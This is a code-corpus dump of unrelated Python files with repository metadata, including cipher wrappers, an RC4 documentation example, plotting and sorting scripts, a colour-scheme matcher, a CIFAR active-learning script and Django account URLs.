| 44
| 0.87395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.260504
|
6299f854c3c07764e1143810fd65fb9514af0ec6
| 2,965
|
py
|
Python
|
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | 2
|
2021-08-22T00:43:05.000Z
|
2021-08-22T01:57:28.000Z
|
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | null | null | null |
pylibressl/cipher/onion.py
|
yl3dy/pylibressl
|
ffc3e195a31a6c96b28e52a7e146995219b220b2
|
[
"MIT"
] | 1
|
2021-08-24T19:09:06.000Z
|
2021-08-24T19:09:06.000Z
|
from .. import lib
from ..exceptions import *
from .. import _libressl
from .cipher import BaseCipher
from .auth import BaseCipherAuth
from .auth import GOST89_HMAC_Streebog512, AES256_GCM
ffi, clib = _libressl.ffi, _libressl.lib
class OnionCipher(object):
"""Onion ciphering."""
@classmethod
def new(cls, cipher_list_, name='NewOnionCipher'):
"""Create new onion cipher chain.
Ciphers are set in encryption order.
"""
if isinstance(cipher_list_, str):
raise ValueError('cipher_list should be a list-like thing')
try:
for cipher in cipher_list_:
if not issubclass(cipher, BaseCipher):
raise ValueError('Cipher list should contain BaseCipher ' +
'subclasses.')
except TypeError:
raise ValueError('cipher_list should be a list-like thing')
return type(name, (cls,), {'cipher_list': cipher_list_})
def __init__(self, key_list):
"""Initialize onion ciphering."""
if len(key_list) != len(self.cipher_list):
raise ValueError('Key list length is not equal to number of ' +
'ciphers in a chain')
self._cipher_instances = [cipher(*key) for cipher, key in
zip(self.cipher_list, key_list)]
def encrypt(self, data):
"""Encrypt a message."""
is_authenticated = [issubclass(cipher, BaseCipherAuth) for cipher in
self.cipher_list]
message, auth_codes = data, []
for cipher, is_ae in zip(self._cipher_instances, is_authenticated):
output = cipher.encrypt(message)
if is_ae:
message, auth_code = output
auth_codes.append(auth_code)
else:
message = output
auth_codes.append(None)
return message, auth_codes
def decrypt(self, data, auth_codes):
"""Decrypt a message."""
if len(auth_codes) != len(self._cipher_instances):
raise ValueError('Authentication code list length mismatch')
is_authenticated = [issubclass(cipher, BaseCipherAuth) for cipher in
self.cipher_list]
message = data
for cipher, is_ae, auth_code in zip(reversed(self._cipher_instances),
reversed(is_authenticated),
reversed(auth_codes)):
if is_ae:
message = cipher.decrypt(message, auth_code)
else:
message = cipher.decrypt(message)
return message
Onion_AES256_GOST89 = OnionCipher.new((AES256_GCM, GOST89_HMAC_Streebog512),
name='Onion_AES256_GOST89')
Onion_AES256_GOST89.__doc__ = 'Onion ciphering: AES256-GCM + ' + \
'GOST89-HMAC-Streebog512'
| 37.0625
| 79
| 0.577403
| 2,464
| 0.831029
| 0
| 0
| 686
| 0.231366
| 0
| 0
| 543
| 0.183137
|
629aa7218a98f287f8a5760fc5e65461390c3529
| 1,149
|
py
|
Python
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 18
|
2020-03-06T14:54:29.000Z
|
2022-03-21T20:20:42.000Z
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 7
|
2020-04-19T15:21:54.000Z
|
2022-03-05T14:27:38.000Z
|
tests/plots/density_estimate.py
|
bws428/ambiance
|
8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612
|
[
"Apache-2.0"
] | 7
|
2019-12-30T16:22:24.000Z
|
2021-09-08T07:36:23.000Z
|
import os
import numpy as np
import matplotlib.pyplot as plt
from ambiance import Atmosphere, CONST
HERE = os.path.abspath(os.path.dirname(__file__))
FILE_NAME = os.path.basename(__file__).replace('.py', '.png')
PATH_OUT = os.path.join(HERE, FILE_NAME)
def density_estimate(h):
return 10**((h - 2.33e3)/-16.3e3)
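# Illustrative sanity check (not part of the original script): at sea level the
# closed-form fit gives roughly 1.39 kg/m^3, in the same ballpark as the ISA
# sea-level density of about 1.225 kg/m^3.
assert abs(density_estimate(0.0) - 1.39) < 0.01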
# Make an atmosphere object
heights = np.linspace(-10e3, 90e3, num=1000)
rho_actual = Atmosphere(heights, check_bounds=False).density
rho_approx = density_estimate(heights)
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, tight_layout=True)
ax1.plot(rho_actual, heights/1000, label='Actual', c='blue')
ax1.plot(rho_approx, heights/1000, '--', label='Estimate', c='red')
ax1.set_xlabel("Density [kg/m^3]")
ax1.set_ylabel("Height [km]")
ax1.set_xscale("log")
ax1.grid()
ax1.legend()
for ax in (ax1, ax2):
ax.axhline(y=CONST.h_min/1000, ls=':', color='black')
ax.axhline(y=CONST.h_max/1000, ls=':', color='black')
rdiff = (rho_approx - rho_actual)/rho_actual
ax2.plot(rdiff*100, heights/1000, label='Relative error', c='red')
ax2.set_xlabel("Relative error [%]")
ax2.grid()
plt.savefig(PATH_OUT)
plt.show()
plt.clf()
| 27.357143
| 68
| 0.711923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.146214
|
629b94b4505379de3aa682273cf3ce0b75e0c007
| 1,277
|
py
|
Python
|
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2015-01-29T06:52:36.000Z
|
2015-01-29T06:52:36.000Z
|
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function
import numba.unittest_support as unittest
from numba.utils import PYVERSION
from .support import TestCase, enable_pyobj_flags
def build_set_usecase(*args):
ns = {}
src = """if 1:
def build_set():
return {%s}
""" % ', '.join(repr(arg) for arg in args)
code = compile(src, '<>', 'exec')
eval(code, ns)
return ns['build_set']
needs_set_literals = unittest.skipIf(PYVERSION < (2, 7),
"set literals unavailable before Python 2.7")
class SetTestCase(TestCase):
@needs_set_literals
def test_build_set(self, flags=enable_pyobj_flags):
pyfunc = build_set_usecase(1, 2, 3, 2)
self.run_nullary_func(pyfunc, flags=flags)
@needs_set_literals
def test_build_heterogenous_set(self, flags=enable_pyobj_flags):
pyfunc = build_set_usecase(1, 2.0, 3j, 2)
self.run_nullary_func(pyfunc, flags=flags)
# Check that items are inserted in the right order (here the
# result will be {2}, not {2.0})
pyfunc = build_set_usecase(2.0, 2)
got, expected = self.run_nullary_func(pyfunc, flags=flags)
self.assertIs(type(got.pop()), type(expected.pop()))
if __name__ == '__main__':
unittest.main()
| 29.697674
| 82
| 0.653876
| 683
| 0.534847
| 0
| 0
| 643
| 0.503524
| 0
| 0
| 228
| 0.178543
|
629ca661207da75df901826b3e4cddc99718c385
| 1,188
|
py
|
Python
|
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | 1
|
2021-07-08T21:37:17.000Z
|
2021-07-08T21:37:17.000Z
|
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | null | null | null |
docs/_static/rc4.py
|
Varbin/pep272-encryption
|
db0795396226a9d49d8825e29c550739ff222539
|
[
"CC0-1.0"
] | null | null | null |
from pep272_encryption import PEP272Cipher, MODE_ECB
block_size = 1
key_size = 0
def new(*args, **kwargs):
return RC4Cipher(*args, **kwargs)
class RC4Cipher(PEP272Cipher):
block_size = 1
key_size = 0
def __init__(self, key, mode=MODE_ECB, **kwargs):
if mode != MODE_ECB:
raise ValueError("Stream ciphers only support ECB mode")
self.S = list(range(256))
j = 0
for i in range(256):
j = (j + self.S[i] + key[i % len(key)]) % 256
self.S[i], self.S[j] = self.S[j], self.S[i]
self.i = self.j = 0
PEP272Cipher.__init__(self, key, mode, **kwargs)
def encrypt_block(self, key, block, **kwargs):
self.i = (self.i + 1) % 256
self.j = (self.j + self.S[self.i]) % 256
self.S[self.i], self.S[self.j] = self.S[self.j], self.S[self.i]
K = self.S[(self.S[self.i] + self.S[self.j]) % 256]
return bytes([block[0] ^ K])
def decrypt_block(self, key, block, **kwargs):
return self.encrypt_block(key, block, **kwargs)
assert RC4Cipher(b'\x01\x02\x03\x04\x05').encrypt(b'\x00'*16) \
== b"\xb29c\x05\xf0=\xc0'\xcc\xc3RJ\n\x11\x18\xa8"
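# Illustrative round trip (not part of the original file). RC4 is symmetric, so
# decrypting with the same key recovers the plaintext; this assumes the
# PEP272Cipher base class exposes the standard PEP 272 ``decrypt`` counterpart
# to ``encrypt``.
message = b'attack at dawn'
ciphered = RC4Cipher(b'\x01\x02\x03\x04\x05').encrypt(message)
assert RC4Cipher(b'\x01\x02\x03\x04\x05').decrypt(ciphered) == message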
| 27.627907
| 71
| 0.574074
| 913
| 0.768519
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.096801
|
629e0a7c590dbbe85c6d17dfffa34ca982e371ac
| 12,316
|
py
|
Python
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 49
|
2016-06-29T22:51:50.000Z
|
2020-07-06T09:15:41.000Z
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 1
|
2019-07-20T11:09:14.000Z
|
2019-07-20T11:09:14.000Z
|
Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py
|
Michael-Villano/Sublime-setup
|
15a992d5982337169dadb50fd0dbca4ca3be992e
|
[
"MIT"
] | 13
|
2016-09-13T13:26:24.000Z
|
2021-04-28T03:17:19.000Z
|
"""
color_scheme_matcher.
Licensed under MIT.
Copyright (C) 2012 Andrew Gibson <agibsonsw@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---------------------
Original code has been heavily modifed by Isaac Muse <isaacmuse@gmail.com> for the ExportHtml project.
Algorithm has been split out into a separate library and been enhanced with a number of features.
"""
from __future__ import absolute_import
import sublime
import re
from .rgba import RGBA
from os import path
from collections import namedtuple
from plistlib import readPlistFromBytes
class SchemeColors(
namedtuple(
'SchemeColors',
['fg', 'fg_simulated', 'bg', "bg_simulated", "style", "fg_selector", "bg_selector", "style_selectors"],
verbose=False
)
):
"""SchemeColors."""
class SchemeSelectors(namedtuple('SchemeSelectors', ['name', 'scope'], verbose=False)):
"""SchemeSelectors."""
def sublime_format_path(pth):
"""Format path for sublime internal use."""
m = re.match(r"^([A-Za-z]{1}):(?:/|\\)(.*)", pth)
if sublime.platform() == "windows" and m is not None:
pth = m.group(1) + "/" + m.group(2)
return pth.replace("\\", "/")
class ColorSchemeMatcher(object):
"""Determine color scheme colors and style for text in a Sublime view buffer."""
def __init__(self, scheme_file, color_filter=None):
"""Initialize."""
if color_filter is None:
color_filter = self.filter
self.color_scheme = path.normpath(scheme_file)
self.scheme_file = path.basename(self.color_scheme)
self.plist_file = color_filter(
readPlistFromBytes(
re.sub(
br"^[\r\n\s]*<!--[\s\S]*?-->[\s\r\n]*|<!--[\s\S]*?-->", b'',
sublime.load_binary_resource(sublime_format_path(self.color_scheme))
)
)
)
self.scheme_file = scheme_file
self.matched = {}
self.parse_scheme()
def filter(self, plist):
"""Dummy filter call that does nothing."""
return plist
def parse_scheme(self):
"""Parse the color scheme."""
color_settings = {}
for item in self.plist_file["settings"]:
if item.get('scope', None) is None and item.get('name', None) is None:
color_settings = item["settings"]
break
# Get general theme colors from color scheme file
bground, bground_sim = self.strip_color(
color_settings.get("background", '#FFFFFF'), simple_strip=True
)
# Need to set background so other colors can simulate their transparency.
self.special_colors = {
"background": {'color': bground, 'color_simulated': bground_sim}
}
fground, fground_sim = self.strip_color(color_settings.get("foreground", '#000000'))
sbground = self.strip_color(color_settings.get("selection", fground))[0]
sbground_sim = self.strip_color(color_settings.get("selection", fground_sim))[1]
sfground, sfground_sim = self.strip_color(color_settings.get("selectionForeground", None))
gbground = self.strip_color(color_settings.get("gutter", bground))[0]
gbground_sim = self.strip_color(color_settings.get("gutter", bground_sim))[1]
gfground = self.strip_color(color_settings.get("gutterForeground", fground))[0]
gfground_sim = self.strip_color(color_settings.get("gutterForeground", fground_sim))[1]
self.special_colors["foreground"] = {'color': fground, 'color_simulated': fground_sim}
self.special_colors["background"] = {'color': bground, 'color_simulated': bground_sim}
self.special_colors["selectionForeground"] = {'color': sfground, 'color_simulated': sfground_sim}
self.special_colors["selection"] = {'color': sbground, 'color_simulated': sbground_sim}
self.special_colors["gutter"] = {'color': gbground, 'color_simulated': gbground_sim}
self.special_colors["gutterForeground"] = {'color': gfground, 'color_simulated': gfground_sim}
# Create scope colors mapping from color scheme file
self.colors = {}
for item in self.plist_file["settings"]:
name = item.get('name', '')
scope = item.get('scope', None)
color = None
style = []
if 'settings' in item and scope is not None:
color = item['settings'].get('foreground', None)
bgcolor = item['settings'].get('background', None)
if 'fontStyle' in item['settings']:
for s in item['settings']['fontStyle'].split(' '):
if s == "bold" or s == "italic": # or s == "underline":
style.append(s)
if scope is not None and (color is not None or bgcolor is not None):
fg, fg_sim = self.strip_color(color)
bg, bg_sim = self.strip_color(bgcolor)
self.colors[scope] = {
"name": name,
"scope": scope,
"color": fg,
"color_simulated": fg_sim,
"bgcolor": bg,
"bgcolor_simulated": bg_sim,
"style": style
}
def strip_color(self, color, simple_strip=False):
"""
Strip transparency from the color value.
Transparency can be stripped in one of two ways:
- Simply mask off the alpha channel.
- Apply the alpha channel to the color essential getting the color seen by the eye.
"""
if color is None or color.strip() == "":
return None, None
rgba = RGBA(color.replace(" ", ""))
if not simple_strip:
bground = self.special_colors['background']['color_simulated']
rgba.apply_alpha(bground if bground != "" else "#FFFFFF")
return color, rgba.get_rgb()
def get_special_color(self, name, simulate_transparency=False):
"""
Get the core colors (background, foreground) for the view and gutter.
Get the visible look of the color by simulated transparency if requrested.
"""
return self.special_colors.get(name, {}).get('color_simulated' if simulate_transparency else 'color')
def get_plist_file(self):
"""Get the plist file used during the process."""
return self.plist_file
def get_scheme_file(self):
"""Get the scheme file used during the process."""
return self.scheme_file
def guess_color(self, scope_key, selected=False, explicit_background=False):
"""
Guess the colors and style of the text for the given Sublime scope.
By default, we always fall back to the schemes default background,
but if desired, we can show that no background was explicitly
specified by returning None. This is done by enabling explicit_background.
This will only show backgrounds that were explicitly specified.
This was orginially introduced for mdpopups so that it would
know when a background was not needed. This allowed mdpopups
to generate syntax highlighted code that could be overlayed on
block elements with different background colors and allow that
background would show through.
"""
color = self.special_colors['foreground']['color']
color_sim = self.special_colors['foreground']['color_simulated']
bgcolor = self.special_colors['background']['color'] if not explicit_background else None
bgcolor_sim = self.special_colors['background']['color_simulated'] if not explicit_background else None
style = set([])
color_selector = SchemeSelectors("foreground", "foreground")
bg_selector = SchemeSelectors("background", "background")
style_selectors = {"bold": SchemeSelectors("", ""), "italic": SchemeSelectors("", "")}
if scope_key in self.matched:
color = self.matched[scope_key]["color"]
color_sim = self.matched[scope_key]["color_simulated"]
style = self.matched[scope_key]["style"]
bgcolor = self.matched[scope_key]["bgcolor"]
bgcolor_sim = self.matched[scope_key]["bgcolor_simulated"]
selectors = self.matched[scope_key]["selectors"]
color_selector = selectors["color"]
bg_selector = selectors["background"]
style_selectors = selectors["style"]
else:
best_match_bg = 0
best_match_fg = 0
best_match_style = 0
for key in self.colors:
match = sublime.score_selector(scope_key, key)
if self.colors[key]["color"] is not None and match > best_match_fg:
best_match_fg = match
color = self.colors[key]["color"]
color_sim = self.colors[key]["color_simulated"]
color_selector = SchemeSelectors(self.colors[key]["name"], self.colors[key]["scope"])
if self.colors[key]["style"] is not None and match > best_match_style:
best_match_style = match
for s in self.colors[key]["style"]:
style.add(s)
if s == "bold":
style_selectors["bold"] = SchemeSelectors(
self.colors[key]["name"], self.colors[key]["scope"]
)
elif s == "italic":
style_selectors["italic"] = SchemeSelectors(
self.colors[key]["name"], self.colors[key]["scope"]
)
if self.colors[key]["bgcolor"] is not None and match > best_match_bg:
best_match_bg = match
bgcolor = self.colors[key]["bgcolor"]
bgcolor_sim = self.colors[key]["bgcolor_simulated"]
bg_selector = SchemeSelectors(self.colors[key]["name"], self.colors[key]["scope"])
if len(style) == 0:
style = ""
else:
style = ' '.join(style)
self.matched[scope_key] = {
"color": color,
"bgcolor": bgcolor,
"color_simulated": color_sim,
"bgcolor_simulated": bgcolor_sim,
"style": style,
"selectors": {
"color": color_selector,
"background": bg_selector,
"style": style_selectors
}
}
if selected:
if self.special_colors['selectionForeground']['color']:
color = self.special_colors['selectionForeground']['color']
                color_sim = self.special_colors['selectionForeground']['color_simulated']
style = ''
if self.special_colors['selection']['color']:
bgcolor = self.special_colors['selection']['color']
                bgcolor_sim = self.special_colors['selection']['color_simulated']
return SchemeColors(
color, color_sim, bgcolor, bgcolor_sim, style,
color_selector, bg_selector, style_selectors
)
| 43.985714
| 120
| 0.60531
| 10,497
| 0.852306
| 0
| 0
| 0
| 0
| 0
| 0
| 4,695
| 0.381211
|
629f16a424f010c4c41e887a5a673cd1324c487c
| 820
|
py
|
Python
|
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
import re
from functools import reduce  # reduce is no longer a builtin on Python 3
class Node:
def __init__(self, id, ip, hostname, type):
self.id = id
self.ip = ip
self.hostname = hostname
self.type = type
self.validate()
def validate(self):
self.illegal = False
if re.match("^(\d{1,3}\.){3}\d{1,3}$", self.ip):
self.illegal = reduce(lambda x, y : x and y, map(lambda x : True if int(x) <= 255 else False, self.ip.split(".")), True)
if self.illegal == False:
raise Exception("IP Format Error, " + self.ip + " is illegal.")
def __repr__(self):
return str(self)
def __str__(self):
return "<IP: %s, id: %s, hostname: %s, type: %s>" % (self.ip, self.id, self.hostname, self.type)
# if __name__ == "__main__":
# a = Node(1, "192.168.1.300", 1, 1)
# a.validate()
| 28.275862
| 132
| 0.540244
| 717
| 0.87439
| 0
| 0
| 0
| 0
| 0
| 0
| 189
| 0.230488
|
629facc04419dcfc8b14e0e646d18577710d3fd8
| 134
|
py
|
Python
|
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
from random import *
l = []
for i in range(50):
l.append(randint(1, 100))
print(l)
for i in range(len(l)):
l[i] **= 2
print(l)
| 16.75
| 29
| 0.58209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
62a017f4ec169c103d6b2ccf1047abf661d12ee5
| 827
|
py
|
Python
|
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
import math
def radix_sort(arr):
if arr != []:
bucket_size = 10
maxLength = False
temp = -1
placement = 1
while not maxLength:
maxLength = True
buckets = [list() for i in range( bucket_size )]
#empty the arr
for i in arr:
temp = math.floor(i / placement)
buckets[temp % bucket_size].append( i )
if maxLength and temp > 0:
maxLength = False
a = 0
#append numbers back to arr in order
for b in range( bucket_size ):
buck = buckets[b]
for i in buck:
arr[a] = i
a += 1
placement *= bucket_size
return arr
return arr
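# Illustrative usage (not part of the original module).
if __name__ == "__main__":
    print(radix_sort([170, 45, 75, 90, 802, 24, 2, 66]))
    # expected output: [2, 24, 45, 66, 75, 90, 170, 802]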
| 28.517241
| 60
| 0.436518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.060459
|
62a043b5cf107ad3ad2080e48c27d0e71c339360
| 4,232
|
py
|
Python
|
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
import os
import random
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision.datasets import CIFAR100, CIFAR10
from tqdm import tqdm
from config import *
from models.resnet import ResNet18
from data.transform import Cifar
random.seed('KMU_AELAB')
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
transforms = Cifar()
if DATASET == 'cifar10':
data_train = CIFAR10('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR10('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR10('./data', train=False, download=True, transform=transforms.test_transform)
elif DATASET == 'cifar100':
data_train = CIFAR100('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR100('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR100('./data', train=False, download=True, transform=transforms.test_transform)
else:
raise FileExistsError
def train_epoch(model, criterion, optimizer, dataloaders):
model.train()
for data in tqdm(dataloaders['train'], leave=False, total=len(dataloaders['train'])):
inputs = data[0].cuda()
labels = data[1].cuda()
optimizer.zero_grad()
scores, features = model(inputs)
loss = criterion(scores, labels)
loss.backward()
optimizer.step()
def test(model, dataloaders, mode='val'):
model.eval()
total = 0
correct = 0
with torch.no_grad():
for (inputs, labels) in dataloaders[mode]:
inputs = inputs.cuda()
labels = labels.cuda()
scores, _ = model(inputs)
_, preds = torch.max(scores.data, 1)
total += labels.size(0)
correct += (preds == labels).sum().item()
return 100 * correct / total
def train(model, criterion, optimizer, scheduler, dataloaders, num_epochs):
print('>> Train a Model.')
checkpoint_dir = os.path.join(f'./trained', 'weights')
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
for epoch in range(num_epochs):
scheduler.step()
train_epoch(model, criterion, optimizer, dataloaders)
print('>> Finished.')
if __name__ == '__main__':
for trial in range(TRIALS):
fp = open(f'record_{trial + 1}.txt', 'w')
indices = list(range(NUM_TRAIN))
random.shuffle(indices)
labeled_set = indices[:INIT_CNT]
unlabeled_set = indices[INIT_CNT:]
train_loader = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
test_loader = DataLoader(data_test, batch_size=BATCH)
dataloaders = {'train': train_loader, 'test': test_loader}
model = ResNet18(num_classes=CLS_CNT).cuda()
torch.backends.cudnn.benchmark = False
for cycle in range(CYCLES):
criterion = nn.CrossEntropyLoss().cuda()
optimizer = optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WDECAY)
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=MILESTONES)
train(model, criterion, optimizer, scheduler, dataloaders, EPOCH)
acc = test(model, dataloaders, mode='test')
fp.write(f'{acc}\n')
print('Trial {}/{} || Cycle {}/{} || Label set size {}: Test acc {}'.format(trial + 1, TRIALS, cycle + 1,
CYCLES, len(labeled_set), acc))
random.shuffle(unlabeled_set)
labeled_set += unlabeled_set[:ADDENDUM]
unlabeled_set = unlabeled_set[ADDENDUM:]
dataloaders['train'] = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
fp.close()
| 32.553846
| 119
| 0.629962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 287
| 0.067817
|
62a2a70bfd5dba6090a4f4d7e8ad09c40c0c9748
| 1,284
|
py
|
Python
|
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
import sys
from nexentaedge.utils import get_sid
from nexentaedge.nedgeConfigurator import NedgeMgmtConfigurator
from utils import get_iface_name_by_mac_from_list
from utils import get_deployment_config
def main():
# check nedge already installed and ready
if get_sid():
return
cfg = get_deployment_config()
plugin = cfg['fuel-plugin-nexentaedge']
replicast_name = get_iface_name_by_mac_from_list(plugin['replicast_macs'])
environment = {
'node_private_ip': '127.0.0.1',
'replicast_eth': replicast_name,
'nedge_node_count': 1,
'nedge_activation_key': plugin['activation_key'],
'nedge_cluster_name': plugin['cluster_name'],
'nedge_tenant_name': plugin['tenant_name'],
'nedge_bucket_name': plugin['bucket_name'],
'profile': plugin['profile'],
'nodocker': True,
'exclude': None,
'reserved': None
}
configurator = NedgeMgmtConfigurator(environment)
if not configurator.configure():
blockers = configurator.get_blockers()
if blockers:
print('blocked')
for blocker in blockers:
print(blocker)
sys.exit(1)
if __name__ == '__main__':
main()
| 29.181818
| 79
| 0.63785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.26947
|
62a3ad6a413be7104ebcc620eae261f63aeb9314
| 1,234
|
py
|
Python
|
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.contrib.auth import views
from . import views
urlpatterns = [
#Custom login view
# url(r'^login/$', views.user_login, name='login'),
#Builtin login view
url(r'^login/$', auth_views.login, name='login'),
url(r'^edit/$', views.edit, name='edit'),
url(r'^logout/$', auth_views.logout, name='logout'),
url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
url(r'^$', views.dashboard, name='dashboard'),
url(r'^password_change/$', auth_views.password_change, name='password_change'),
url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
url(r'^register/$', views.register, name='register'),
]
| 51.416667
| 143
| 0.71799
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 537
| 0.43517
|
62a3b336bd6bebedcff30395fd32342d7e3cb1c2
| 10,195
|
py
|
Python
|
examples/twitter.py
|
alex/remoteobjects
|
4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | 1
|
2015-11-08T12:46:28.000Z
|
2015-11-08T12:46:28.000Z
|
examples/twitter.py
|
alex/remoteobjects
|
